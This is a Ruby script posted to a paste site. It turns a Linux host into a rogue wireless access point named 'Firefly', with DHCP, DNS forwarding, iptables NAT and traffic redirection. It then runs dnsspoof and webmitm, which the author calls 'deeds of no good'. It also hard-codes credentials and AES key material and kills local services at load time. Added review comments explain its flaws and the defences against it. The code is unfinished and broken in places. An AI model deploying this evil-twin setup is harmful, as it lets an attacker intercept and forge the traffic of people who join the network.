
Untitled

a guest
Jun 28th, 2017
  1. #!/usr/bin/ruby
  2. #capn-jack_mr_hai_signature_string
  3. # This is a work in progress; I'm going to eventually make a complete handler for a wireless router.
  4. # I started trying to make WAP software in Ruby, but after a while I started realizing that I shouldn't reinvent the wheel,
  5. # I should just make a really good car. I'm going to incorporate a bit of C and Python also: the C to speed it up and the Python
  6. # for some packet manipulation in the stream using scapy.
  7. # The configuration options are all constants. I figured that instead of asking each time (since people generally have a
  8. # consistent setup) you set them in the code. The class "packet_filter" is the filter (no really?!?!); I generally use nested ifs
  9. # for the heuristics, but you can do whatever here.
  10.  
  11. #install script
  12. #timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
  13. require 'socket'
  14. require 'openssl'
  15. require 'rubygems'
  16. require 'net/ssh'
  17.  
  18. #find alternatives to avahi and network manager
  19. #maybe make a WAP connection script?
  20. # iw? ifconfig? both !
  21. #airodump to showcase the area, iwconfig to connect
  22. #dhclient to get an IP
  23.  
  24.  
  25. #ACL from ruby doc
  26. # have it be invoked as a response to snort
  27. #
  28.  
  29. #ssh/encryption config
# NOTE(security): the credentials and key material below are hard-coded, so
# anyone who can read this file has them. Loading them from the environment or
# from a permission-restricted file keeps them out of source and out of pastes.
# HOST, USER and PASS are not referenced anywhere else in the visible code.
HOST = '192.168.1.113'
USER = 'username'
PASS = 'password'
# 32 bytes, the key size aes-256-cbc expects. A keyboard-walk string carries far
# less entropy than a randomly generated key.
KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
# NOTE(security): identical to KEY and constant for every message, so equal
# plaintexts always encrypt to equal ciphertexts. It is also 32 bytes long while
# the AES block (and therefore CBC IV) size is 16 bytes; newer Ruby OpenSSL
# bindings reject an IV of the wrong length, older ones silently truncated it.
IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
# Plaintext marker that Socket_IO_crypt#client prepends to the ciphertext.
PREAMBLE="begin_encryption"

#general config
# Not read anywhere in the visible code; the header comment mentions timed pcap
# saves "if ACTBAD" — presumably a feature switch, confirm.
$ACTBAD=true
# $VERBOSE is Ruby's built-in warning-level global, not an application flag:
# setting it to true switches on verbose interpreter warnings for the process.
$VERBOSE = true
LOGGING= true
# Interface names used by the shell commands further down.
MONITOR="mon0"
EXTIF="eth1"
TUNNEL="at0"
INTIF="wlan1"
TTY="/dev/tty10"
CHAN = "9"
ESSID="Firefly"
# Each backtick command runs in its own child shell as soon as this file is
# loaded. The alias is defined in a shell that exits immediately, so it is not
# available to any later command.
`alias wpas='sudo killall -9 wpa_supplicant'`
# Kills avahi-daemon on the local host at load time.
`sudo killall -9 avahi-daemon `
#DHCP config
# Values interpolated into the interfaces, dhcpd and bind templates in WAPinit.
RANGE="192.168.1.2 192.168.1.254"
SCOPE="192.168.1.0"
GATEWAY="192.168.1.1"
MASK="255.255.255.0"
BROADCAST="192.168.1.255"
DOMAIN="cerberusrouter.net"
DNS1="208.67.222.222"
DNS2="208.67.220.220"
  59.  
  60.  
  61.  
  62. #Handles encryption
  63. #example
  64. #   #preparing my balls for encryption
  65. #   balls = Encryption.new("balls")
  66. #   #encrypting my balls
  67. #   balls.encrypt_payload
  68. class Encryption
  69.     def initialize (string)
  70.         @string = string
  71.     end
  72.     #encrypts
  73.     def encrypt_payload
  74.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  75.         cipher.encrypt
  76.         cipher.key = WAPinit::KEY
  77.         cipher.iv = WAPinit::IV
  78.         cipher.update(@string) + cipher.final
  79.        
  80.     end
  81.     #decrypts
  82.     def decrypt_payload
  83.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  84.         cipher.decrypt
  85.         cipher.key = WAPinit::KEY
  86.         cipher.iv = WAPinit::IV
  87.         cipher.update(@string) + cipher.final
  88.     end
  89.    
  90. end
  91.  
# Unfinished wrapper around SSH port forwarding.
#
# NOTE(review): this class has no closing `end` in the visible source, so the
# definitions that follow end up nested inside it.
class SSH_handler
  # Takes user, host and password, but none of them is stored or used: the
  # command below interpolates @user and @host, which are never assigned.
  def initialize(user, host, password)  
  # Shells out to the system ssh client asking for a local forward
  # (-L 1337:localhost:22) in background mode (-f).
  # NOTE(security): the interpolated values are handed to a shell. If they ever
  # come from outside this file, pass them as separate arguments (for example
  # system('ssh', '-f', target, ...)) instead of building a command string.
  `ssh -f #{@user}@#{@host} -L 1337:localhost:22`
    # NOTE(review): the next line is a raw shell command, not Ruby; it looks
    # like a pasted example of the command above.
    ssh -f Firefly@theowned.net -L 1337:localhost:22
 
  end
 
# Second copy of a require that already appears at the top of the file.
require 'net/ssh'
# 'server' and 'user' are literal placeholder strings, not the HOST/USER
# constants. The block registers a local forward (3307 -> 127.0.0.1:3306 as
# seen from the remote side) and then returns immediately.
Net::SSH.start('server','user') do |session|
 
session.forward.local(3307,'127.0.0.1', 3306)
 
end
  105.  
  106. #Uploads and Downloads from remote host
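# Copies a single file to or from a remote host over SCP, authenticating with
# a password.
#
# NOTE(review): Net::SCP is provided by the net-scp gem, while the requires
# visible at the top of this file only load net/ssh — presumably a
# `require 'net/scp'` is still needed; confirm.
# NOTE(security): the password is kept in the instance for its whole lifetime.
# Key-based authentication avoids holding a reusable secret in memory and in
# the calling code.
class Scp_IO
  # @param file [String] path of the file to transfer (local for #upload,
  #   remote for #download)
  # @param directory [String] destination path (remote for #upload, local for
  #   #download)
  # @param host [String] remote host name or address
  # @param user [String] remote account name
  # @param password [String] password for +user+
  def initialize(file ,directory, host, user, password)
    @file     = file
    @dir      = directory
    @host     = host
    @user     = user
    @password = password
  end

  # Sends @file to @dir on the remote host and waits for completion.
  #
  # @return [Object] whatever Net::SCP#upload! returns
  def upload
    with_session { |scp| scp.upload!(@file, @dir) }
  end

  # Fetches @file from the remote host into @dir and waits for completion.
  #
  # @return [Object] whatever Net::SCP#download! returns
  def download
    with_session { |scp| scp.download!(@file, @dir) }
  end

  private

  # Opens an SCP session, yields it, and returns the block's value.
  # The block form of Net::SCP.start closes the underlying SSH session when
  # the block finishes, including on error; the non-block form used before
  # left every session open.
  def with_session
    outcome = nil
    Net::SCP.start(@host, @user, password: @password) do |scp|
      outcome = yield scp
    end
    outcome
  end
end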
  126.  
  127. #this is a socket client to tx/rx streamimg aes-256 encrypted data.
# TCP client/server pair meant to exchange AES-encrypted strings that are
# prefixed with the plaintext PREAMBLE marker.
#
# NOTE(security): PREAMBLE is a fixed value sent in the clear, so it identifies
# the protocol but authenticates nobody; any peer that knows the marker passes
# the check. Together with the fixed key/IV and the lack of a MAC in
# Encryption, a receiver cannot tell who sent a message or whether it was
# modified on the way.
class Socket_IO_crypt
  # @param data the string #client encrypts and sends
  # @param port TCP port to listen on (#server) or connect to (#client)
  # @param host remote host for #client; #server does not use it
  def initialize(data, port, host)
  @io_obj = data
  @port = port
  @host = host
  end
 
# Listens for incoming connections on @port and checks them for the preamble.
# No host is passed to TCPServer.open, so the listener is not restricted to a
# single local address.
  def server
    server = TCPServer.open(@port)
    loop {                        
      rx = server.accept
     
      # NOTE(review): rx is the accepted socket. scan and gsub are String
      # methods, and nothing is read from the socket before they are called.
      if rx.scan(::PREAMBLE)
        encrypted_str = rx.gsub(::PREAMBLE , "")
        # Only wraps the data in an Encryption object; decrypt_payload is never
        # called, and the connection is not closed on this path.
        decrypted_str = Encryption.new(encrypted_str)
        #send decrypted data to handler, possibly copy of the client?
      else rx.puts "This is not yours"
        rx.close
      end
    }
  end
# Sends PREAMBLE followed by the encrypted @io_obj to @host on @port.
  def client
      tx = TCPSocket.open(@host, @port)
      data = Encryption.new(@io_obj)
      crypt_data = data.encrypt_payload
      # puts appends a newline, and the raw ciphertext may itself contain
      # newline bytes, so a line-based reader cannot recover the message
      # boundaries reliably.
      tx.puts ::PREAMBLE + crypt_data      
      # Not inside an ensure: an exception above leaves the socket open.
      tx.close
  end
end
  160.  
  161. class Http_server
  162.   def initialize(port, header, max_connect, host)
  163.     @host = host #(insert php server self here)
  164.   end
  165.  
  166. end
  167.  
  168.  
  169. #instances of this class start the show
# Reconfigures the local host as a wireless access point with its own DHCP
# service, DNS forwarder and NAT rules.
#
# The class defines no methods. Every statement sits directly in the class
# body, so all of it runs once, at the moment this definition is evaluated.
#
# Side effects on the host that are visible below (nothing is backed up first
# and nothing is restored afterwards):
#   * /etc/network/interfaces, /etc/dhcp3/dhcpd.conf and
#     /etc/bind/named.conf.options are overwritten from the templates here
#   * all iptables chains and the NAT table are flushed and replaced, and IPv4
#     forwarding is switched on
#   * avahi-daemon and wpa_supplicant are killed; networking and bind9 are
#     restarted
# Presumably this has to run as root, given the paths and commands involved.
#
# NOTE(security): clients that join the advertised ESSID get their addresses,
# DNS and default route from this host, so it sees and can redirect their
# traffic. A network name alone proves nothing about who operates an access
# point; TLS with certificate validation (and HSTS), a VPN, and wireless
# intrusion detection that flags unexpected APs are the relevant protections.
class WAPinit
`/etc/init.d/networking restart`
# Templates for the interfaces file, the bind options and the DHCP server
# configuration. The file-level constants are interpolated when each heredoc
# is evaluated.
interfaces = <<INTERFACE
#loopback interface
    auto lo iface lo inet loopback

    # interface external network (internet), configured through dhcp
    auto #{EXTIF}
    iface #{EXTIF} inet dhcp

    #interface network 1
    auto #{INTIF}
    iface #{INTIF} inet static
            address #{GATEWAWY}
            netmask #{MASK}
            network #{SCOPE}
            broadcast #{BROADCAST}



INTERFACE

bind = <<BIND
options {
    directory "/var/cache/bind";
   
    forwarders {
        #{GATEWAY};
       
    };

    auth-nxdomain no;    # conform to RFC1035
    listen-on-v6 { any; };
};
BIND


dhcp3 = <<DHCP
ddns-update-style interim;                                  
ignore client-updates;

subnet #{SCOPE} netmask #{MASK} {

        range #{RANGE};                  
           option subnet-mask              #{MASK};    # Default subnet mask to be used by DHCP clients
           option broadcast-address        #{BROADCAST};    # Default broadcast address to be used by DHCP clients
           option routers                  #{GATEWAY};      # Default gateway to be used by DHCP clients
           option domain-name              "#{DOMAIN}";
           option domain-name-servers      #{DNS1}, #{DNS2};           # Default DNS to be used by DHCP clients
}
#         DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
#       option ipforwarding off;

         default-lease-time 21600;                            # Amount of time in seconds that a client may keep the IP address
        max-lease-time 43200;

        option time-offset              -18000;              # Eastern Standard Time
#       option ntp-servers              192.168.1.1;         # Default NTP server to be used by DHCP clients
DHCP

# Opened for writing with "w", which truncates the existing file. The handle is
# never closed; syswrite writes unbuffered, so the data does reach the file.
ifaces = File.open("/etc/network/interfaces", "w")
ifaces.syswrite(interfaces)
`route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
`route add -net -n 0.0.0.0 dev #{EXTIF}`
# The command output is passed as printf's format string, so any '%' in it
# would be interpreted as a format directive.
printf `route`

# Intended to branch on which interface names show up in the ifconfig output.
# The mon* and at* branches are empty; only the wlan* branch does any work.
if `ifconfig`.match(/mon[0-9]/) = true

   elsif `ifconfig`.match(/at[0-9]/) = true

   elsif `ifconfig`.match(/wlan[0-9]/) = true
#     `sudo killall -9 NetworkManager`
     # Stops services that would otherwise manage the wireless interface, then
     # hands INTIF to airmon-ng on channel CHAN.
     `sudo killall -9 avahi-daemon`
     `killall -9 wpa_supplicant`
     `airmon-ng start #{INTIF} #{CHAN}`
     `gnome-terminal -e airodump-ng #{MONITOR}`
     # changemac is not defined in this file — presumably an external helper
     # that alters the interface MAC address; confirm.
     `changemac #{EXTIF}`
     `changemac #{INTIF}`
     `killall -9 wpa_supplicant`
     # airbase-ng is started in a forked child so this script can carry on;
     # Process.detach keeps the child from lingering as a zombie.
     pid = fork do
       `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
     end
    Process.detach(pid)
   else printf "Something happened with the interfaces, please configure your system and plug in any devices"
  end
# Fixed delay before the tunnel interface is brought up.
sleep 4
`ifconfig #{TUNNEL} up`
#begin the router-fu!
# Load the netfilter, connection-tracking and NAT kernel modules.
`modprobe ip_tables`
`modprobe iptable_filter`
`modprobe ip_conntrack`
`modprobe ip_conntrack_ftp`
`modprobe ip_conntrack_irc`
`modprobe iptable_nat`
`modprobe ip_nat_ftp`
`modprobe ip_nat_irc`
`echo "1" > /proc/sys/net/ipv4/ip_dynaddr`
# Wipe the existing firewall state. Whatever rules the host had before are
# lost. INPUT and OUTPUT default to ACCEPT afterwards, FORWARD to DROP.
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --flush`
`iptables -P INPUT ACCEPT`
`iptables -F INPUT `
`iptables -P OUTPUT ACCEPT`
`iptables -F OUTPUT `
`iptables -P FORWARD DROP`
`iptables -F FORWARD `
`iptables -t nat -F`
# Forwarding and NAT for traffic arriving on TUNNEL and leaving via EXTIF.
`iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
`iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
`iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
`iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
`iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
# These two rules rewrite client traffic: every UDP/53 packet is sent to
# GATEWAY regardless of the resolver the client chose, and TCP/80 arriving on
# TUNNEL is redirected to local port 80. Encrypted DNS and HTTPS with
# certificate validation are not affected by rules of this kind.
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
`iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`
`echo "1" > /proc/sys/net/ipv4/ip_forward`
# The interface name is written out as at0 here instead of using TUNNEL.
`ifconfig at0 up`
`ifconfig at0 #{GATEWAY} netmask #{MASK}`
`ifconfig at0 mtu 1500`
# Same pattern as the interfaces file: truncate, write, never close.
dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
dhcpconf.syswrite(dhcp3)
`dhcpd3 #{TUNNEL}`
dnsf = File.open("/etc/bind/named.conf.options", "w")
dnsf.syswrite(bind)
printf `/etc/init.d/bind9 restart`
`notify-send "#{ESSID} - Wireless Access Point initialized"`
end
  297.  
  298. #Starting the server
# WAPinit defines no initialize. Its setup already ran when the class body was
# evaluated, so this only creates an instance that is not used afterwards.
WAPinit.new

# so far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
# transparency and configuring the interfaces.

#now we begin the deeds of no good

# dnsspoof and webmitm are tools from the dsniff suite. dnsspoof answers DNS
# queries seen on TUNNEL with forged replies, and webmitm proxies the web
# traffic that has been redirected to this host.
# NOTE(security): intercepting HTTPS this way depends on the client accepting a
# certificate it cannot validate. Strict certificate validation, HSTS and
# encrypted or validated DNS blunt both steps. Certificate warnings and DNS
# answers that all point at the local gateway are the signs a user or a monitor
# would see.
`dnsspoof -i #{TUNNEL}`
sleep 1
`webmitm -d -d -d`
sleep 1